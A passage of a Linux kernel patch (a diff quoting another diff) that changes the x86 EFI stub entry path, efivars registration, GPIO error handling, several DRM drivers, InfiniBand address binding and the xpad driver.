+ 	 * bootloader and passed via bootparams. We permit an initrd loaded
+@@ -897,7 +923,7 @@ asmlinkage unsigned long efi_main(efi_handle_t handle,
+ 
+ 	setup_efi_pci(boot_params);
+ 
+-	setup_quirks(boot_params, bzimage_addr, buffer_end - buffer_start);
++	setup_quirks(boot_params);
+ 
+ 	status = exit_boot(boot_params, handle);
+ 	if (status != EFI_SUCCESS) {
+@@ -905,9 +931,38 @@ asmlinkage unsigned long efi_main(efi_handle_t handle,
+ 		goto fail;
+ 	}
+ 
+-	return bzimage_addr;
++	/*
++	 * Call the SEV init code while still running with the firmware's
++	 * GDT/IDT, so #VC exceptions will be handled by EFI.
++	 */
++	sev_enable(boot_params);
++
++	efi_5level_switch();
++
++	enter_kernel(kernel_entry, boot_params);
+ fail:
+-	efi_err("efi_main() failed!\n");
++	efi_err("efi_stub_entry() failed!\n");
+ 
+ 	efi_exit(handle, status);
+ }
++
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++void efi_handover_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
++			struct boot_params *boot_params)
++{
++	extern char _bss[], _ebss[];
++
++	memset(_bss, 0, _ebss - _bss);
++	efi_stub_entry(handle, sys_table_arg, boot_params);
++}
++
++#ifndef CONFIG_EFI_MIXED
++extern __alias(efi_handover_entry)
++void efi32_stub_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
++		      struct boot_params *boot_params);
++
++extern __alias(efi_handover_entry)
++void efi64_stub_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
++		      struct boot_params *boot_params);
++#endif
++#endif
+diff --git a/drivers/firmware/efi/libstub/x86-stub.h b/drivers/firmware/efi/libstub/x86-stub.h
+new file mode 100644
+index 0000000000000..1c20e99a64944
+--- /dev/null
++++ b/drivers/firmware/efi/libstub/x86-stub.h
+@@ -0,0 +1,17 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++
++#include <linux/efi.h>
++
++extern void trampoline_32bit_src(void *, bool);
++extern const u16 trampoline_ljmp_imm_offset;
++
++efi_status_t efi_adjust_memory_range_protection(unsigned long start,
++						unsigned long size);
++
++#ifdef CONFIG_X86_64
++efi_status_t efi_setup_5level_paging(void);
++void efi_5level_switch(void);
++#else
++static inline efi_status_t efi_setup_5level_paging(void) { return EFI_SUCCESS; }
++static inline void efi_5level_switch(void) {}
++#endif
+diff --git a/drivers/firmware/efi/vars.c b/drivers/firmware/efi/vars.c
+index 0ba9f18312f5b..4ca256bcd6971 100644
+--- a/drivers/firmware/efi/vars.c
++++ b/drivers/firmware/efi/vars.c
+@@ -66,19 +66,28 @@ int efivars_register(struct efivars *efivars,
+ 		     const struct efivar_operations *ops,
+ 		     struct kobject *kobject)
+ {
++	int rv;
++
+ 	if (down_interruptible(&efivars_lock))
+ 		return -EINTR;
+ 
++	if (__efivars) {
++		pr_warn("efivars already registered\n");
++		rv = -EBUSY;
++		goto out;
++	}
++
+ 	efivars->ops = ops;
+ 	efivars->kobject = kobject;
+ 
+ 	__efivars = efivars;
+ 
+ 	pr_info("Registered efivars operations\n");
+-
++	rv = 0;
++out:
+ 	up(&efivars_lock);
+ 
+-	return 0;
++	return rv;
+ }
+ EXPORT_SYMBOL_GPL(efivars_register);
+ 
+diff --git a/drivers/gpio/gpio-74x164.c b/drivers/gpio/gpio-74x164.c
+index e00c333105170..753e7be039e4d 100644
+--- a/drivers/gpio/gpio-74x164.c
++++ b/drivers/gpio/gpio-74x164.c
+@@ -127,8 +127,6 @@ static int gen_74x164_probe(struct spi_device *spi)
+ 	if (IS_ERR(chip->gpiod_oe))
+ 		return PTR_ERR(chip->gpiod_oe);
+ 
+-	gpiod_set_value_cansleep(chip->gpiod_oe, 1);
+-
+ 	spi_set_drvdata(spi, chip);
+ 
+ 	chip->gpio_chip.label = spi->modalias;
+@@ -153,6 +151,8 @@ static int gen_74x164_probe(struct spi_device *spi)
+ 		goto exit_destroy;
+ 	}
+ 
++	gpiod_set_value_cansleep(chip->gpiod_oe, 1);
++
+ 	ret = gpiochip_add_data(&chip->gpio_chip, chip);
+ 	if (!ret)
+ 		return 0;
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index 6d3e3454a6ed6..9d8c783124033 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -784,11 +784,11 @@ int gpiochip_add_data_with_key(struct gpio_chip *gc, void *data,
+ 
+ 	ret = gpiochip_irqchip_init_valid_mask(gc);
+ 	if (ret)
+-		goto err_remove_acpi_chip;
++		goto err_free_hogs;
+ 
+ 	ret = gpiochip_irqchip_init_hw(gc);
+ 	if (ret)
+-		goto err_remove_acpi_chip;
++		goto err_remove_irqchip_mask;
+ 
+ 	ret = gpiochip_add_irqchip(gc, lock_key, request_key);
+ 	if (ret)
+@@ -813,13 +813,13 @@ int gpiochip_add_data_with_key(struct gpio_chip *gc, void *data,
+ 	gpiochip_irqchip_remove(gc);
+ err_remove_irqchip_mask:
+ 	gpiochip_irqchip_free_valid_mask(gc);
+-err_remove_acpi_chip:
++err_free_hogs:
++	gpiochip_free_hogs(gc);
+ 	acpi_gpiochip_remove(gc);
++	gpiochip_remove_pin_ranges(gc);
+ err_remove_of_chip:
+-	gpiochip_free_hogs(gc);
+ 	of_gpiochip_remove(gc);
+ err_free_gpiochip_mask:
+-	gpiochip_remove_pin_ranges(gc);
+ 	gpiochip_free_valid_mask(gc);
+ 	if (gdev->dev.release) {
+ 		/* release() has been registered by gpiochip_setup_dev() */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/Makefile b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+index 6fdf87a6e240f..6c7b286e1123d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+@@ -51,8 +51,12 @@ endif
+ endif
+ 
+ ifneq ($(CONFIG_FRAME_WARN),0)
++ifeq ($(filter y,$(CONFIG_KASAN)$(CONFIG_KCSAN)),y)
++frame_warn_flag := -Wframe-larger-than=3072
++else
+ frame_warn_flag := -Wframe-larger-than=2048
+ endif
++endif
+ 
+ CFLAGS_$(AMDDALPATH)/dc/dml/display_mode_lib.o := $(dml_ccflags)
+ 
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+index dc0a6fba7050f..ff1032de4f76d 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+@@ -6925,6 +6925,23 @@ static int si_dpm_enable(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
++static int si_set_temperature_range(struct amdgpu_device *adev)
++{
++	int ret;
++
++	ret = si_thermal_enable_alert(adev, false);
++	if (ret)
++		return ret;
++	ret = si_thermal_set_temperature_range(adev, R600_TEMP_RANGE_MIN, R600_TEMP_RANGE_MAX);
++	if (ret)
++		return ret;
++	ret = si_thermal_enable_alert(adev, true);
++	if (ret)
++		return ret;
++
++	return ret;
++}
++
+ static void si_dpm_disable(struct amdgpu_device *adev)
+ {
+ 	struct rv7xx_power_info *pi = rv770_get_pi(adev);
+@@ -7608,6 +7625,18 @@ static int si_dpm_process_interrupt(struct amdgpu_device *adev,
+ 
+ static int si_dpm_late_init(void *handle)
+ {
++	int ret;
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++
++	if (!adev->pm.dpm_enabled)
++		return 0;
++
++	ret = si_set_temperature_range(adev);
++	if (ret)
++		return ret;
++#if 0 //TODO ?
++	si_dpm_powergate_uvd(adev, true);
++#endif
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 7098f125b54a9..fd32041f82263 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -332,6 +332,7 @@ alloc_range_bias(struct drm_buddy *mm,
+ 		 u64 start, u64 end,
+ 		 unsigned int order)
+ {
++	u64 req_size = mm->chunk_size << order;
+ 	struct drm_buddy_block *block;
+ 	struct drm_buddy_block *buddy;
+ 	LIST_HEAD(dfs);
+@@ -367,6 +368,15 @@ alloc_range_bias(struct drm_buddy *mm,
+ 		if (drm_buddy_block_is_allocated(block))
+ 			continue;
+ 
++		if (block_start < start || block_end > end) {
++			u64 adjusted_start = max(block_start, start);
++			u64 adjusted_end = min(block_end, end);
++
++			if (round_down(adjusted_end + 1, req_size) <=
++			    round_up(adjusted_start, req_size))
++				continue;
++		}
++
+ 		if (contains(start, end, block_start, block_end) &&
+ 		    order == drm_buddy_block_order(block)) {
+ 			/*
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index 119544d88b586..fbac39aa38cc4 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -316,32 +316,34 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 		goto exit_afbcd;
+ 
+ 	if (has_components) {
+-		ret = component_bind_all(drm->dev, drm);
++		ret = component_bind_all(dev, drm);
+ 		if (ret) {
+ 			dev_err(drm->dev, "Couldn't bind all components\n");
++			/* Do not try to unbind */
++			has_components = false;
+ 			goto exit_afbcd;
+ 		}
+ 	}
+ 
+ 	ret = meson_encoder_hdmi_init(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = meson_plane_create(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = meson_overlay_create(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = meson_crtc_create(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = request_irq(priv->vsync_irq, meson_irq, 0, drm->driver->name, drm);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	drm_mode_config_reset(drm);
+ 
+@@ -359,15 +361,18 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ uninstall_irq:
+ 	free_irq(priv->vsync_irq, drm);
+-unbind_all:
+-	if (has_components)
+-		component_unbind_all(drm->dev, drm);
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
+ free_drm:
+ 	drm_dev_put(drm);
+ 
++	meson_encoder_hdmi_remove(priv);
++	meson_encoder_cvbs_remove(priv);
++
++	if (has_components)
++		component_unbind_all(dev, drm);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/meson/meson_encoder_cvbs.c b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+index 3f73b211fa8e3..3407450435e20 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_cvbs.c
++++ b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+@@ -294,6 +294,5 @@ void meson_encoder_cvbs_remove(struct meson_drm *priv)
+ 	if (priv->encoders[MESON_ENC_CVBS]) {
+ 		meson_encoder_cvbs = priv->encoders[MESON_ENC_CVBS];
+ 		drm_bridge_remove(&meson_encoder_cvbs->bridge);
+-		drm_bridge_remove(meson_encoder_cvbs->next_bridge);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/meson/meson_encoder_hdmi.c b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+index b14e6e507c61b..03062e7a02b64 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_hdmi.c
++++ b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+@@ -472,6 +472,5 @@ void meson_encoder_hdmi_remove(struct meson_drm *priv)
+ 	if (priv->encoders[MESON_ENC_HDMI]) {
+ 		meson_encoder_hdmi = priv->encoders[MESON_ENC_HDMI];
+ 		drm_bridge_remove(&meson_encoder_hdmi->bridge);
+-		drm_bridge_remove(meson_encoder_hdmi->next_bridge);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/tegra/drm.c b/drivers/gpu/drm/tegra/drm.c
+index 5fc55b9777cbf..6806779f8ecce 100644
+--- a/drivers/gpu/drm/tegra/drm.c
++++ b/drivers/gpu/drm/tegra/drm.c
+@@ -1252,9 +1252,26 @@ static int host1x_drm_probe(struct host1x_device *dev)
+ 
+ 	drm_mode_config_reset(drm);
+ 
+-	err = drm_aperture_remove_framebuffers(&tegra_drm_driver);
+-	if (err < 0)
+-		goto hub;
++	/*
++	 * Only take over from a potential firmware framebuffer if any CRTCs
++	 * have been registered. This must not be a fatal error because there
++	 * are other accelerators that are exposed via this driver.
++	 *
++	 * Another case where this happens is on Tegra234 where the display
++	 * hardware is no longer part of the host1x complex, so this driver
++	 * will not expose any modesetting features.
++	 */
++	if (drm->mode_config.num_crtc > 0) {
++		err = drm_aperture_remove_framebuffers(&tegra_drm_driver);
++		if (err < 0)
++			goto hub;
++	} else {
++		/*
++		 * Indicate to userspace that this doesn't expose any display
++		 * capabilities.
++		 */
++		drm->driver_features &= ~(DRIVER_MODESET | DRIVER_ATOMIC);
++	}
+ 
+ 	err = tegra_drm_fb_init(drm);
+ 	if (err < 0)
+diff --git a/drivers/infiniband/core/cm_trace.h b/drivers/infiniband/core/cm_trace.h
+index e9d282679ef15..944d9071245d2 100644
+--- a/drivers/infiniband/core/cm_trace.h
++++ b/drivers/infiniband/core/cm_trace.h
+@@ -16,7 +16,7 @@
+ 
+ #include <linux/tracepoint.h>
+ #include <rdma/ib_cm.h>
+-#include <trace/events/rdma.h>
++#include <trace/misc/rdma.h>
+ 
+ /*
+  * enum ib_cm_state, from include/rdma/ib_cm.h
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 0773ca7ace247..067d7f42871ff 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -3547,121 +3547,6 @@ static int cma_resolve_ib_addr(struct rdma_id_private *id_priv)
+ 	return ret;
+ }
+ 
+-static int cma_bind_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
+-			 const struct sockaddr *dst_addr)
+-{
+-	struct sockaddr_storage zero_sock = {};
+-
+-	if (src_addr && src_addr->sa_family)
+-		return rdma_bind_addr(id, src_addr);
+-
+-	/*
+-	 * When the src_addr is not specified, automatically supply an any addr
+-	 */
+-	zero_sock.ss_family = dst_addr->sa_family;
+-	if (IS_ENABLED(CONFIG_IPV6) && dst_addr->sa_family == AF_INET6) {
+-		struct sockaddr_in6 *src_addr6 =
+-			(struct sockaddr_in6 *)&zero_sock;
+-		struct sockaddr_in6 *dst_addr6 =
+-			(struct sockaddr_in6 *)dst_addr;
+-
+-		src_addr6->sin6_scope_id = dst_addr6->sin6_scope_id;
+-		if (ipv6_addr_type(&dst_addr6->sin6_addr) & IPV6_ADDR_LINKLOCAL)
+-			id->route.addr.dev_addr.bound_dev_if =
+-				dst_addr6->sin6_scope_id;
+-	} else if (dst_addr->sa_family == AF_IB) {
+-		((struct sockaddr_ib *)&zero_sock)->sib_pkey =
+-			((struct sockaddr_ib *)dst_addr)->sib_pkey;
+-	}
+-	return rdma_bind_addr(id, (struct sockaddr *)&zero_sock);
+-}
+-
+-/*
+- * If required, resolve the source address for bind and leave the id_priv in
+- * state RDMA_CM_ADDR_BOUND. This oddly uses the state to determine the prior
+- * calls made by ULP, a previously bound ID will not be re-bound and src_addr is
+- * ignored.
+- */
+-static int resolve_prepare_src(struct rdma_id_private *id_priv,
+-			       struct sockaddr *src_addr,
+-			       const struct sockaddr *dst_addr)
+-{
+-	int ret;
+-
+-	memcpy(cma_dst_addr(id_priv), dst_addr, rdma_addr_size(dst_addr));
+-	if (!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND, RDMA_CM_ADDR_QUERY)) {
+-		/* For a well behaved ULP state will be RDMA_CM_IDLE */
+-		ret = cma_bind_addr(&id_priv->id, src_addr, dst_addr);
+-		if (ret)
+-			goto err_dst;
+-		if (WARN_ON(!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND,
+-					   RDMA_CM_ADDR_QUERY))) {
+-			ret = -EINVAL;
+-			goto err_dst;
+-		}
+-	}
+-
+-	if (cma_family(id_priv) != dst_addr->sa_family) {
+-		ret = -EINVAL;
+-		goto err_state;
+-	}
+-	return 0;
+-
+-err_state:
+-	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
+-err_dst:
+-	memset(cma_dst_addr(id_priv), 0, rdma_addr_size(dst_addr));
+-	return ret;
+-}
+-
+-int rdma_resolve_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
+-		      const struct sockaddr *dst_addr, unsigned long timeout_ms)
+-{
+-	struct rdma_id_private *id_priv =
+-		container_of(id, struct rdma_id_private, id);
+-	int ret;
+-
+-	ret = resolve_prepare_src(id_priv, src_addr, dst_addr);
+-	if (ret)
+-		return ret;
+-
+-	if (cma_any_addr(dst_addr)) {
+-		ret = cma_resolve_loopback(id_priv);
+-	} else {
+-		if (dst_addr->sa_family == AF_IB) {
+-			ret = cma_resolve_ib_addr(id_priv);
+-		} else {
+-			/*
+-			 * The FSM can return back to RDMA_CM_ADDR_BOUND after
+-			 * rdma_resolve_ip() is called, eg through the error
+-			 * path in addr_handler(). If this happens the existing
+-			 * request must be canceled before issuing a new one.
+-			 * Since canceling a request is a bit slow and this
+-			 * oddball path is rare, keep track once a request has
+-			 * been issued. The track turns out to be a permanent
+-			 * state since this is the only cancel as it is
+-			 * immediately before rdma_resolve_ip().
+-			 */
+-			if (id_priv->used_resolve_ip)
+-				rdma_addr_cancel(&id->route.addr.dev_addr);
+-			else
+-				id_priv->used_resolve_ip = 1;
+-			ret = rdma_resolve_ip(cma_src_addr(id_priv), dst_addr,
+-					      &id->route.addr.dev_addr,
+-					      timeout_ms, addr_handler,
+-					      false, id_priv);
+-		}
+-	}
+-	if (ret)
+-		goto err;
+-
+-	return 0;
+-err:
+-	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
+-	return ret;
+-}
+-EXPORT_SYMBOL(rdma_resolve_addr);
+-
+ int rdma_set_reuseaddr(struct rdma_cm_id *id, int reuse)
+ {
+ 	struct rdma_id_private *id_priv;
+@@ -4064,27 +3949,26 @@ int rdma_listen(struct rdma_cm_id *id, int backlog)
+ }
+ EXPORT_SYMBOL(rdma_listen);
+ 
+-int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
++static int rdma_bind_addr_dst(struct rdma_id_private *id_priv,
++			      struct sockaddr *addr, const struct sockaddr *daddr)
+ {
+-	struct rdma_id_private *id_priv;
++	struct sockaddr *id_daddr;
+ 	int ret;
+-	struct sockaddr  *daddr;
+ 
+ 	if (addr->sa_family != AF_INET && addr->sa_family != AF_INET6 &&
+ 	    addr->sa_family != AF_IB)
+ 		return -EAFNOSUPPORT;
+ 
+-	id_priv = container_of(id, struct rdma_id_private, id);
+ 	if (!cma_comp_exch(id_priv, RDMA_CM_IDLE, RDMA_CM_ADDR_BOUND))
+ 		return -EINVAL;
+ 
+-	ret = cma_check_linklocal(&id->route.addr.dev_addr, addr);
++	ret = cma_check_linklocal(&id_priv->id.route.addr.dev_addr, addr);
+ 	if (ret)
+ 		goto err1;
+ 
+ 	memcpy(cma_src_addr(id_priv), addr, rdma_addr_size(addr));
+ 	if (!cma_any_addr(addr)) {
+-		ret = cma_translate_addr(addr, &id->route.addr.dev_addr);
++		ret = cma_translate_addr(addr, &id_priv->id.route.addr.dev_addr);
+ 		if (ret)
+ 			goto err1;
+ 
+@@ -4104,8 +3988,10 @@ int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
+ 		}
+ #endif
+ 	}
+-	daddr = cma_dst_addr(id_priv);
+-	daddr->sa_family = addr->sa_family;
++	id_daddr = cma_dst_addr(id_priv);
++	if (daddr != id_daddr)
++		memcpy(id_daddr, daddr, rdma_addr_size(addr));
++	id_daddr->sa_family = addr->sa_family;
+ 
+ 	ret = cma_get_port(id_priv);
+ 	if (ret)
+@@ -4121,6 +4007,129 @@ int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
+ 	cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND, RDMA_CM_IDLE);
+ 	return ret;
+ }
++
++static int cma_bind_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
++			 const struct sockaddr *dst_addr)
++{
++	struct rdma_id_private *id_priv =
++		container_of(id, struct rdma_id_private, id);
++	struct sockaddr_storage zero_sock = {};
++
++	if (src_addr && src_addr->sa_family)
++		return rdma_bind_addr_dst(id_priv, src_addr, dst_addr);
++
++	/*
++	 * When the src_addr is not specified, automatically supply an any addr
++	 */
++	zero_sock.ss_family = dst_addr->sa_family;
++	if (IS_ENABLED(CONFIG_IPV6) && dst_addr->sa_family == AF_INET6) {
++		struct sockaddr_in6 *src_addr6 =
++			(struct sockaddr_in6 *)&zero_sock;
++		struct sockaddr_in6 *dst_addr6 =
++			(struct sockaddr_in6 *)dst_addr;
++
++		src_addr6->sin6_scope_id = dst_addr6->sin6_scope_id;
++		if (ipv6_addr_type(&dst_addr6->sin6_addr) & IPV6_ADDR_LINKLOCAL)
++			id->route.addr.dev_addr.bound_dev_if =
++				dst_addr6->sin6_scope_id;
++	} else if (dst_addr->sa_family == AF_IB) {
++		((struct sockaddr_ib *)&zero_sock)->sib_pkey =
++			((struct sockaddr_ib *)dst_addr)->sib_pkey;
++	}
++	return rdma_bind_addr_dst(id_priv, (struct sockaddr *)&zero_sock, dst_addr);
++}
++
++/*
++ * If required, resolve the source address for bind and leave the id_priv in
++ * state RDMA_CM_ADDR_BOUND. This oddly uses the state to determine the prior
++ * calls made by ULP, a previously bound ID will not be re-bound and src_addr is
++ * ignored.
++ */
++static int resolve_prepare_src(struct rdma_id_private *id_priv,
++			       struct sockaddr *src_addr,
++			       const struct sockaddr *dst_addr)
++{
++	int ret;
++
++	if (!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND, RDMA_CM_ADDR_QUERY)) {
++		/* For a well behaved ULP state will be RDMA_CM_IDLE */
++		ret = cma_bind_addr(&id_priv->id, src_addr, dst_addr);
++		if (ret)
++			return ret;
++		if (WARN_ON(!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND,
++					   RDMA_CM_ADDR_QUERY)))
++			return -EINVAL;
++
++	} else {
++		memcpy(cma_dst_addr(id_priv), dst_addr, rdma_addr_size(dst_addr));
++	}
++
++	if (cma_family(id_priv) != dst_addr->sa_family) {
++		ret = -EINVAL;
++		goto err_state;
++	}
++	return 0;
++
++err_state:
++	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
++	return ret;
++}
++
++int rdma_resolve_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
++		      const struct sockaddr *dst_addr, unsigned long timeout_ms)
++{
++	struct rdma_id_private *id_priv =
++		container_of(id, struct rdma_id_private, id);
++	int ret;
++
++	ret = resolve_prepare_src(id_priv, src_addr, dst_addr);
++	if (ret)
++		return ret;
++
++	if (cma_any_addr(dst_addr)) {
++		ret = cma_resolve_loopback(id_priv);
++	} else {
++		if (dst_addr->sa_family == AF_IB) {
++			ret = cma_resolve_ib_addr(id_priv);
++		} else {
++			/*
++			 * The FSM can return back to RDMA_CM_ADDR_BOUND after
++			 * rdma_resolve_ip() is called, eg through the error
++			 * path in addr_handler(). If this happens the existing
++			 * request must be canceled before issuing a new one.
++			 * Since canceling a request is a bit slow and this
++			 * oddball path is rare, keep track once a request has
++			 * been issued. The track turns out to be a permanent
++			 * state since this is the only cancel as it is
++			 * immediately before rdma_resolve_ip().
++			 */
++			if (id_priv->used_resolve_ip)
++				rdma_addr_cancel(&id->route.addr.dev_addr);
++			else
++				id_priv->used_resolve_ip = 1;
++			ret = rdma_resolve_ip(cma_src_addr(id_priv), dst_addr,
++					      &id->route.addr.dev_addr,
++					      timeout_ms, addr_handler,
++					      false, id_priv);
++		}
++	}
++	if (ret)
++		goto err;
++
++	return 0;
++err:
++	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
++	return ret;
++}
++EXPORT_SYMBOL(rdma_resolve_addr);
++
++int rdma_bind_addr(struct rdma_cm_id *id, struct sockaddr *addr)
++{
++	struct rdma_id_private *id_priv =
++		container_of(id, struct rdma_id_private, id);
++
++	return rdma_bind_addr_dst(id_priv, addr, cma_dst_addr(id_priv));
++}
+ EXPORT_SYMBOL(rdma_bind_addr);
+ 
+ static int cma_format_hdr(void *hdr, struct rdma_id_private *id_priv)
+diff --git a/drivers/infiniband/core/cma_trace.h b/drivers/infiniband/core/cma_trace.h
+index e45264267bcc9..47f3c6e4be893 100644
+--- a/drivers/infiniband/core/cma_trace.h
++++ b/drivers/infiniband/core/cma_trace.h
+@@ -15,7 +15,7 @@
+ #define _TRACE_RDMA_CMA_H
+ 
+ #include <linux/tracepoint.h>
+-#include <trace/events/rdma.h>
++#include <trace/misc/rdma.h>
+ 
+ 
+ DECLARE_EVENT_CLASS(cma_fsm_class,
+diff --git a/drivers/infiniband/core/user_mad.c b/drivers/infiniband/core/user_mad.c
+index d96c78e436f98..5c284dfbe6923 100644
+--- a/drivers/infiniband/core/user_mad.c
++++ b/drivers/infiniband/core/user_mad.c
+@@ -131,6 +131,11 @@ struct ib_umad_packet {
+ 	struct ib_user_mad mad;
+ };
+ 
++struct ib_rmpp_mad_hdr {
++	struct ib_mad_hdr	mad_hdr;
++	struct ib_rmpp_hdr      rmpp_hdr;
++} __packed;
++
+ #define CREATE_TRACE_POINTS
+ #include <trace/events/ib_umad.h>
+ 
+@@ -494,11 +499,11 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 			     size_t count, loff_t *pos)
+ {
+ 	struct ib_umad_file *file = filp->private_data;
++	struct ib_rmpp_mad_hdr *rmpp_mad_hdr;
+ 	struct ib_umad_packet *packet;
+ 	struct ib_mad_agent *agent;
+ 	struct rdma_ah_attr ah_attr;
+ 	struct ib_ah *ah;
+-	struct ib_rmpp_mad *rmpp_mad;
+ 	__be64 *tid;
+ 	int ret, data_len, hdr_len, copy_offset, rmpp_active;
+ 	u8 base_version;
+@@ -506,7 +511,7 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 	if (count < hdr_size(file) + IB_MGMT_RMPP_HDR)
+ 		return -EINVAL;
+ 
+-	packet = kzalloc(sizeof *packet + IB_MGMT_RMPP_HDR, GFP_KERNEL);
++	packet = kzalloc(sizeof(*packet) + IB_MGMT_RMPP_HDR, GFP_KERNEL);
+ 	if (!packet)
+ 		return -ENOMEM;
+ 
+@@ -560,13 +565,13 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 		goto err_up;
+ 	}
+ 
+-	rmpp_mad = (struct ib_rmpp_mad *) packet->mad.data;
+-	hdr_len = ib_get_mad_data_offset(rmpp_mad->mad_hdr.mgmt_class);
++	rmpp_mad_hdr = (struct ib_rmpp_mad_hdr *)packet->mad.data;
++	hdr_len = ib_get_mad_data_offset(rmpp_mad_hdr->mad_hdr.mgmt_class);
+ 
+-	if (ib_is_mad_class_rmpp(rmpp_mad->mad_hdr.mgmt_class)
++	if (ib_is_mad_class_rmpp(rmpp_mad_hdr->mad_hdr.mgmt_class)
+ 	    && ib_mad_kernel_rmpp_agent(agent)) {
+ 		copy_offset = IB_MGMT_RMPP_HDR;
+-		rmpp_active = ib_get_rmpp_flags(&rmpp_mad->rmpp_hdr) &
++		rmpp_active = ib_get_rmpp_flags(&rmpp_mad_hdr->rmpp_hdr) &
+ 						IB_MGMT_RMPP_FLAG_ACTIVE;
+ 	} else {
+ 		copy_offset = IB_MGMT_MAD_HDR;
+@@ -615,12 +620,12 @@ static ssize_t ib_umad_write(struct file *filp, const char __user *buf,
+ 		tid = &((struct ib_mad_hdr *) packet->msg->mad)->tid;
+ 		*tid = cpu_to_be64(((u64) agent->hi_tid) << 32 |
+ 				   (be64_to_cpup(tid) & 0xffffffff));
+-		rmpp_mad->mad_hdr.tid = *tid;
++		rmpp_mad_hdr->mad_hdr.tid = *tid;
+ 	}
+ 
+ 	if (!ib_mad_kernel_rmpp_agent(agent)
+-	   && ib_is_mad_class_rmpp(rmpp_mad->mad_hdr.mgmt_class)
+-	   && (ib_get_rmpp_flags(&rmpp_mad->rmpp_hdr) & IB_MGMT_RMPP_FLAG_ACTIVE)) {
++	    && ib_is_mad_class_rmpp(rmpp_mad_hdr->mad_hdr.mgmt_class)
++	    && (ib_get_rmpp_flags(&rmpp_mad_hdr->rmpp_hdr) & IB_MGMT_RMPP_FLAG_ACTIVE)) {
+ 		spin_lock_irq(&file->send_lock);
+ 		list_add_tail(&packet->list, &file->send_list);
+ 		spin_unlock_irq(&file->send_lock);
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 02f3bc4e4895e..13c36f51b9353 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -564,6 +564,9 @@ struct xboxone_init_packet {
+ #define GIP_MOTOR_LT BIT(3)
+ #define GIP_MOTOR_ALL (GIP_MOTOR_R | GIP_MOTOR_L | GIP_MOTOR_RT | GIP_MOTOR_LT)
+ 
++#define GIP_WIRED_INTF_DATA 0
++#define GIP_WIRED_INTF_AUDIO 1
++
+ /*
+  * This packet is required for all Xbox One pads with 2015
+  * or later firmware installed (or present from the factory).
+@@ -2008,7 +2011,7 @@ static int xpad_probe(struct usb_interface *intf, const struct usb_device_id *id
+ 	}
+ 
+ 	if (xpad->xtype == XTYPE_XBOXONE &&
